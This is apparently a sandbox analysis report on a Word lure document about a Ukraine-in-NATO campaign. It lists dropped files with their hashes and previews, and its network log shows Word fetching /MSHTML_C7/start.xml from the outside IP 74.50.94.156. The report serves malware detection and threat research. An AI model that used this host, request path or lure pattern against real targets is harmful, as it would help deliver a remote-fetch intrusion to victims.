                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:hwprA3R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:XA
                                                                                                                                          MD5:234430F3D3032B9648671D3DF168D827
                                                                                                                                          SHA1:4B7606E1F7E8172EE74DE90EE4CA75E3F44A0A2B
                                                                                                                                          SHA-256:DC7160C2FE5939E82BFEEE180C1DA8176C4914C034CAE8938ED6C9F7A9144F3E
                                                                                                                                          SHA-512:943119B65B2017F8FAAD5EC6B490CC8E263EC6128DD3D274A54EFB826FBE4353C72D335F5708974F1624E9BAE971C9D112905638B3F2123FC384DB201DE5B26C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):284802
                                                                                                                                          Entropy (8bit):5.006325058456308
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:B9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:G
                                                                                                                                          MD5:08AD981C6D9BFD066BF29A77A62F0FEA
                                                                                                                                          SHA1:DBE60C2A2BC9A80EFBD6BE114BDF1416261C94E6
                                                                                                                                          SHA-256:BCFB2EF3D37F7DAFCB9FF4D92885C5F87B4BEC7A3045BC7208460DAE7DABAE31
                                                                                                                                          SHA-512:64A939705679AA9EBD66634059A63BE280DF197845F23334906EF419C891E1393700344EE8D200195B72509874AD6046495815B94C1BF998116C351BC483C6EB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):294525
                                                                                                                                          Entropy (8bit):4.978414555953716
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:ndkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:Y
                                                                                                                                          MD5:96F3CCC20E23824F1904EDFDFE5CDA02
                                                                                                                                          SHA1:EF78E9B415A9FFD4094E525509D3AEB3E2A68EEE
                                                                                                                                          SHA-256:9970654851826C920261D52F8536B1305F7E582C7A2E892BAC344A95F909FE63
                                                                                                                                          SHA-512:1022D3E990B1A31361C9658C6C15DB9B41DA38E73319C93C62EE8E57E36333261F66897E1F0F6502EC28B780A9FC434E7F548178F3BC1D4463A44BCF508604E1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):270642
                                                                                                                                          Entropy (8bit):5.074829646335759
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:JwprAi5R95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:WL
                                                                                                                                          MD5:831E5489F3047AFF2EFDFF758FA42FEC
                                                                                                                                          SHA1:F27C9E96D726464E802AD007FE749B8F27FF4525
                                                                                                                                          SHA-256:7914A8B4ADFDC9A6589ED181DE46D3D735676A38AA61B8FAFC0F862B9EC3A1CD
                                                                                                                                          SHA-512:B84800FAB9FDF2AEFACBFC14527BC8361459E5138309E11C1025CF61A855C481E77EF14623182F485F3122A40BA4F873E4300B8D8209D924E3E16646FA34BCB8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):217578
                                                                                                                                          Entropy (8bit):5.069961862348856
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                          MD5:7777C0173259D8F4A4F5E69C1461CA14
                                                                                                                                          SHA1:9C83B87C098AECF3CDFC1B5C4C78B696BF14A5E6
                                                                                                                                          SHA-256:A343D61BAB2F25D138BDCC57D33C4A83FD494A54EAF3DF0F539E3B51CFE011F1
                                                                                                                                          SHA-512:77BFD6F7D21AB9771DF1993FB9AB82BA6D5E900F0B846F0F11578313E8A99C99E095612510CBB07590367EADE9B31CF396B26ABA5E8380F3ABC0886FA02858B9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):255219
                                                                                                                                          Entropy (8bit):5.004117790808506
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:MwprA8niNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:x
                                                                                                                                          MD5:C9460BEAF863E337428518DAF5C09C5C
                                                                                                                                          SHA1:76BE7E80D117A73A4FFC96682345EECE9A5C4D2A
                                                                                                                                          SHA-256:A69368BE9AC843B088D739F1573007E634D1068DB0AD9937A95FE7A0690C05E0
                                                                                                                                          SHA-512:9E4A7D3E019D182CD6CFF4947364DCF435EF3B40BA004A360260EDA0712839875CB797DBFCCCD9E50885EB10AEF8695052899E4BAC16423D0EECCF025CF6B03F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 251336
Entropy (8bit): 5.057713103491112
Encrypted: false
SSDEEP: 6144:JwprA6sS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:u9
MD5: DAE31FA14BC97723A87F126B5121BAE3
SHA1: C6B5CFF442FCC8795A5AF0D69ACDA24497D9F4BE
SHA-256: 30F377F7AC24B022F52371ADA97CB057460265F4C8BDDBB521642B6E2462EE27
SHA-512: AE6B8BB6FCF956E1973C9E40702CB1A86FD8AD6F87FA1C2D3A2113C2F8AEC2A495FE636D71786843496F37FF9DB3D2F0E034BC4014D9C379E4EA4CC9495BE907
Malicious: false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 344662
Entropy (8bit): 5.023256859004611
Encrypted: false
SSDEEP: 6144:UwprAwnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:F
MD5: F82561FF802442D12B8B77EC6EDC027E
SHA1: EE7ED23C6EF8DA4968BA969FC094203D61065C0E
SHA-256: 5B7A52DFAA9C3E9E340E081178B54E827ED591AC27DC098C3985C94BDE5CABE9
SHA-512: FA205BCD1D61226A940EA333B3B3EC43FB461E7683669A344403B543B9F699677A9E332827EC0160E81A8FBFD43CA61735A5C414EE7C17143DC9819A137044B5
Malicious: false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 37730
Entropy (8bit): 3.124503226655357
Encrypted: false
SSDEEP: 768:XatNbFeZKdogeyHMOeYhIVi+iOFOqbPXdEmanb:2/eLAhIVJb2
MD5: 4DA38001D6DEE4E1C7291AE22F197FCD
SHA1: 82F5B0774C6483A43A1E1A661A8828D560673981
SHA-256: 2ACCDCBAABD6ADFC09B582BA45F48E5EDBFF932F3DE360711D3E0A826DF51740
SHA-512: 8C4E08CE3955EE837ED7FCC7AFCC0F1F528B7721BB0CCDEE4BB7727E51C3F9464E6F0C178923EEB2C7DA83AF5BA3DF768AA7BE3149BF94A7D1C1E5D12C0A7F87
Malicious: false
                                                                                                                                          Preview:....,a..b.......R.....(.c.)...........(.e.)...... ....(.r.)...........(.t.m.)....."!..............& ....a.b.b.o.u.t.....a.b.o.u.t.....a.b.o.t.u.....a.b.o.u.t.....a.b.o.u.t.a.....a.b.o.u.t. .a.....a.b.o.u.t.i.t.....a.b.o.u.t. .i.t.....a.b.o.u.t.t.h.e.....a.b.o.u.t. .t.h.e.....a.b.s.c.e.n.c.e.....a.b.s.e.n.c.e.....a.c.c.e.s.o.r.i.e.s.....a.c.c.e.s.s.o.r.i.e.s.....a.c.c.i.d.a.n.t.....a.c.c.i.d.e.n.t.....a.c.c.o.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.c.o.r.d.i.n.g.t.o.....a.c.c.o.r.d.i.n.g. .t.o.....a.c.c.r.o.s.s.....a.c.r.o.s.s.....a.c.h.e.i.v.e.....a.c.h.i.e.v.e.....a.c.h.e.i.v.e.d.....a.c.h.i.e.v.e.d.....a.c.h.e.i.v.i.n.g.....a.c.h.i.e.v.i.n.g.....a.c.n.....c.a.n.....a.c.o.m.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.o.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.t.u.a.l.y.l.....a.c.t.u.a.l.l.y.....a.d.d.i.t.i.n.a.l.....a.d.d.i.t.i.o.n.a.l.....a.d.d.t.i.o.n.a.l.....a.d.d.i.t.i.o.n.a.l.....a.d.e.q.u.i.t.....a.d.e.q.u.a.t.e.....a.d.e.q.u.i.t.e.....a.d.e.q.u.a.t.e.....a.d.n.....

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 21:56:29 2022, mtime=Tue Jul 4 01:17:42 2023, atime=Tue Jul 4 01:17:20 2023, length=120614, window=hide
Category: dropped
Size (bytes): 1238
Entropy (8bit): 4.794870667732745
Encrypted: false
SSDEEP: 12:8t/xaUhWCHo62j2OF+WDRu7IlLMSNMBKjEjA9/E2jXzhbcla5MSNMBsD8sR8B8fS:8t/sXRGYLMSeMQA982cgMSeWDv7aB6m
MD5: 7E9D1BE414D03EEAAEBFB49F74828037
SHA1: FE762BCB94A25468BD0F40EE4E6637BC0963F382
SHA-256: 8E3A6DC131F93F45721644EDA6864DB515C5F3F7BB0FBCBFD29F7A01CC3296B4
SHA-512: DE44F59DF5EAEA8413A094907C067A38D47F35F438AA83F23F4690BFAF811209FD8568361F6794183D104F25CDD98DA0328FBCC58813F77741EC73FD72E037FF
Malicious: false
                                                                                                                                          Preview:L..................F.... ...(..k...k........4.....&.......................-....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...V%.....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1......U....user..B.......N...V%......S....................ui".e.n.g.i.n.e.e.r.....~.1......U....Desktop.h.......N...V%......Y..............>......Z..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.&....V+. .OVERVI~1.DOC..........U...V+......R......................-.O.v.e.r.v.i.e.w._.o.f._.U.W.C.s._.U.k.r.a.i.n.e.I.n.N.A.T.O._.c.a.m.p.a.i.g.n...d.o.c.x...d.o.c.......y...............-.......x...........>.S......C:\Users\user\Desktop\Overview_of_UWCs_UkraineInNATO_campaign.docx.doc..G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.v.e.r.v.i.e.w._.o.f._.U.W.C.s._.U.k.r.a.i.n.e.I.n.N.A.T.O._.c.a.m.p.a.i.g.n...d.o.c.x...d.o.c.........:..,.LB.)...A}...`.......X.......377142...........!a..%.H.VZAj.....c2.........-$..!a..%.H

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eduardo, Template: Normal.dotm, Last Saved By: Eduardo, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 13 14:11:00 2022, Last Saved Time/Date: Wed Apr 13 14:11:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Category: dropped
Size (bytes): 23870
Entropy (8bit): 3.126890272974214
Encrypted: false
SSDEEP: 192:zWjUlLZEvA+6/6rNavrgYjk+4bWl92zBi1RH1rGOJU:zWjo8iSwvxjk+t9+i1RH1rG3
MD5: 26A6A0C852677A193994E4A3CCC8C2EB
SHA1: 70560AFF35F1904F822E49D3316303877819EEF8
SHA-256: 07377209FE68A98E9BCA310D9749DAA4EB79558E9FC419CF0B02A9E37679038D
SHA-512: BF35991FEC81B96EAE2CE5C90AE627DD6CF11C61C5369DC34BBBC65E24C3E1F413F475BDB8321F455E5F4B6EAA833B3D33F847C744C68AE6E853A373AD2B37AE
Malicious: false
                                                                                                                                          Preview:......................>.........<html>........'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................=.............................bjbj..............................L..hL..h..................................................................................F.......F...............................................................................................................t...................................................................M.......O.......O.......O.......O.......O.......O...$...B...........F...s.....................................................................

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:gAWYp:qYp
MD5: ACC88D3264FC06AE3584A8ED90009260
SHA1: FD63700F852BE379C417253CA869CC1C5E2F46A0
SHA-256: E9066838A2265B9327318C602ED6954BC1A26869C19FAA255CD26A3C7CE707A7
SHA-512: CB41EF87941B26F1CB25DB61536A6C89F3B7A3BC67B4CFBE7290DD528DACC6870A08CDC2AABAF289382A5CD7EF96C95556B05B8EAD3FB1317DFCD18B6302E456
Malicious: false
Preview: [ZoneTransfer]..ZoneId=1..

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Generic INItialization configuration [folders]
Category: dropped
Size (bytes): 122
Entropy (8bit): 4.99287143244066
Encrypted: false
SSDEEP: 3:M1oADzXG97UIf4B8m1ddLFSm4AAzXG97UIf4B8m1ddLFSv:MW4X/IS8mjdLFF4X/IS8mjdLFc
MD5: 103701A2E0B21C22F308A6B6FD225D0E
SHA1: 410657E462719CEBB647324B5B1B836A547411B4
SHA-256: AD6258A58670B0FCCB0167EA38C571F76662EF78DB4078E965959DE99A6589A0
SHA-512: 12EB7747DC1F66033A6D1BA1331D57B2FA8A19B27265795646741F71D55AF4D0B2DFD8DA8F4120914CFCB100F41B6C37513FF2ED3FE0419F05FFC809E878D1FC
Malicious: false
Preview: [doc]..Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK=0..[folders]..Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK=0..

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 3.014103769944679
Encrypted: false
SSDEEP: 3:Rl/Zd++pIHUxePl3UPPGSnr7+Ul:RtZ0jPlkPPGSr7+8
MD5: B17964D2D801558E3399B214376E72AC
SHA1: E6BB00A9E58DC8BC4363B2E386B637F08ECA8E53
SHA-256: EAFEBB1AF744D4E97F3C1D9C3ED8067F30193D35D8539EEF3A6C8588F4D7666A
SHA-512: 85E8D4BC4484A96AE391BAD57C61077AFB7FE02762356F1A784C2C51AE699FB976DD97D764FF35341B9B894B8911E00061745B82EA4CFFB1BE13D3165C892C74
Malicious: false
                                                                                                                                          Preview:.pratesh................................................p.r.a.t.e.s.h...........H..@......"..........in........T..A......."...j......not.......P..B......."..+...

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: GLS_BINARY_LSB_FIRST
Category: dropped
Size (bytes): 196
Entropy (8bit): 3.8335661211449588
Encrypted: false
SSDEEP: 3:rmHD/tH//llleYhtC4d1ydYhtq5kZtzllmVl/tllB1elHMDOJ1/y/ln:rmHurYtzKZksDQotn
MD5: C971BCCE0A87FC0DC153BE52CE6DE3DD
SHA1: 6688165AF020ADD26EA866152AC6612812E8A884
SHA-256: 3A2441D00821E6E695322DA78B24F5FC54A88F5E85885985FED64B13814C80F5
SHA-512: 5A6E5A55BB9128AD47BC2A612E2FEA9F4632AF785D12D92962594EBC87655B6EAC08A9FDE9FECD87BC1B784B7A325C7908A7922C8A9D89B5D5FC3484A5A9E822
Malicious: false
                                                                                                                                          Preview:........t........................O2Kp....xZG.n......]..........+.H`.........O2Kp....xZG.n.....,..l..@E....................P.......8.......................\.\.1.0.4...2.3.4...2.3.9...2.6.....e...

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: GLS_BINARY_LSB_FIRST
Category: dropped
Size (bytes): 196
Entropy (8bit): 3.731718693656962
Encrypted: false
SSDEEP: 3:rmHD/tH//lllK3yeM1y73ye0ZtzllmVl/tllGl1elHMDOJ1/zt:rmHW3HL73HItzKOlksDQD
MD5: D6F46E706A361EEA4337CC2D1BE7A235
SHA1: E5B2C0179E3BFE5A46B1E6A2327C0E627D1AFEAE
SHA-256: 9C68457DB47275DF55114EDDAEFC879F5C5AA39AEF323148AAEE8FBD076DB9FE
SHA-512: 67A9398A4255B2727D486C236C4F0205F3CE6E52A4C68852D110B1E97F4882FB79736C2E7EE4224228AC9368EA7602F1C8B9B7AACC809F9FDD93E085A21375F4
Malicious: false
                                                                                                                                          Preview:........t..........................k...6.3F..~4Z.....]..........+.H`...........k...6.3F..~4Z....,..l..@E....................P.......8.......................\.\.1.0.4...2.3.4...2.3.9...2.6.....d...

File type: Microsoft Word 2007+
Entropy (8bit): 7.975913596069179
TrID:
• Word Microsoft Office Open XML Format document (49504/1) 49.01%
• Word Microsoft Office Open XML Format document (43504/1) 43.07%
• ZIP compressed archive (8000/1) 7.92%
File name: Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
File size: 120'614 bytes
MD5: d227874863036b8e73a3894a19bd25a0
SHA1: 2400b169ee2c38ac146c67408debc9b4fa4fca5f
SHA256: a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163f
SHA512: 5304a8f4fce0718df717e67b0c91b3aef670f8fa226ee49dc23b72bb677301d310016626433ee8336f393f2afc92609f6c69c99862055c71316bef3f762714ed
SSDEEP: 3072:l7+cULFyt0l7P8trDG5CL1WvRC5pugMExFAiWRXlV:lPrtWuK5C8vE5puiFAimlV
TLSH: 68C312118381678FD3050A79E22DAF72F4B5D352D232A3CAAD42E36DAD8885357C56AC
                                                                                                                                          File Content Preview:PK..........!.........N......._rels/.rels ...(.................................................................................................................................................................................................................
Icon Hash: 39f5a98c818aacb3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 3, 2023 19:17:36.865119934 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:17:36.963917017 CEST | 80 | 49708 | 74.50.94.156 | 192.168.2.6
Jul 3, 2023 19:17:36.964085102 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:17:36.964513063 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:17:37.067236900 CEST | 80 | 49708 | 74.50.94.156 | 192.168.2.6
Jul 3, 2023 19:17:37.067425966 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:17:44.381493092 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:17:44.520148039 CEST | 80 | 49708 | 74.50.94.156 | 192.168.2.6
Jul 3, 2023 19:17:48.182789087 CEST | 80 | 49708 | 74.50.94.156 | 192.168.2.6
Jul 3, 2023 19:17:48.182914972 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:18:29.230432034 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:18:29.370326996 CEST | 80 | 49708 | 74.50.94.156 | 192.168.2.6
Jul 3, 2023 19:18:30.853779078 CEST | 80 | 49708 | 74.50.94.156 | 192.168.2.6
Jul 3, 2023 19:18:30.854516983 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:18:32.241492987 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:18:32.380738020 CEST | 80 | 49708 | 74.50.94.156 | 192.168.2.6
Jul 3, 2023 19:18:32.888693094 CEST | 80 | 49708 | 74.50.94.156 | 192.168.2.6
Jul 3, 2023 19:18:32.888977051 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:18:34.623435974 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
Jul 3, 2023 19:18:34.725302935 CEST | 80 | 49708 | 74.50.94.156 | 192.168.2.6
Jul 3, 2023 19:18:34.725552082 CEST | 49708 | 80 | 192.168.2.6 | 74.50.94.156
                                                                                                                                          • 74.50.94.156
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49708 | 74.50.94.156 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 3, 2023 19:17:36.964513063 CEST | 339 | OUT | GET /MSHTML_C7/start.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.50.94.156
Connection: Keep-Alive
Jul 3, 2023 19:17:37.067236900 CEST | 341 | IN | HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Jul 2023 14:29:04 GMT
Accept-Ranges: bytes
ETag: "b4952ab8baadd91:0"
Server: Microsoft-IIS/10.0
